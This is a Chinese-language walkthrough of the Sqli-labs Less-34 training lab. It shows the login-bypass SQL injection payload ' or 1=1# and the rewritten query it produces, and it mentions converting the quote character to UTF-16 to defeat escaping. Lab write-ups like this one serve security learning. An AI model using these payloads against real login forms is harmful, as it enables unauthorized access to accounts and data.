zoukankan      html  css  js  c++  java
  • Sqli-labs less 34

    Less-34

    本关是post型的注入漏洞,同样的也是将post过来的内容进行了 ' 的处理。由上面的例子可以看到我们的方法就是将过滤函数添加的 给吃掉。而get型的方式我们是以url形式提交的,因此数据会通过URLencode,如何将方法用在post型的注入当中,我们此处介绍一个新的方法。将utf-8转换为utf-16或 utf-32,例如将 ' 转为utf-16为 ' 。我们就可以利用这个方式进行尝试。

    我们用万能密码的方式的来突破这一关。

    例如上图中直接提交username:' or 1=1#

    Password:随便乱填

    可以看到下面显示正常登陆。

    原始的sql语句为

        @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";

    此时sql语句为

    SELECT username, password FROM users WHERE username='' or 1=1#' and password='$passwd' LIMIT 0,1

    Explain:SELECT username, password FROM users WHERE username='' or 1=1起到作用,后面的则被#注释掉了。而起作用的的语句不论select选择出来的内容是什么与 1=1进行or操作后,始终是1。

  • 相关阅读:
    请求接口时params和data的区别
    深拷贝
    react学习笔记---父子组件间值得传递
    表单验证自定义二选一
    vue数据复杂时的表单验证
    jq获取路径参数的方法
    删除对象中的元素的方法
    iOS的URL处理
    cocoapod的下载安装解释
    初探博客园
  • 原文地址:https://www.cnblogs.com/lcamry/p/5762925.html
Copyright © 2011-2022 走看看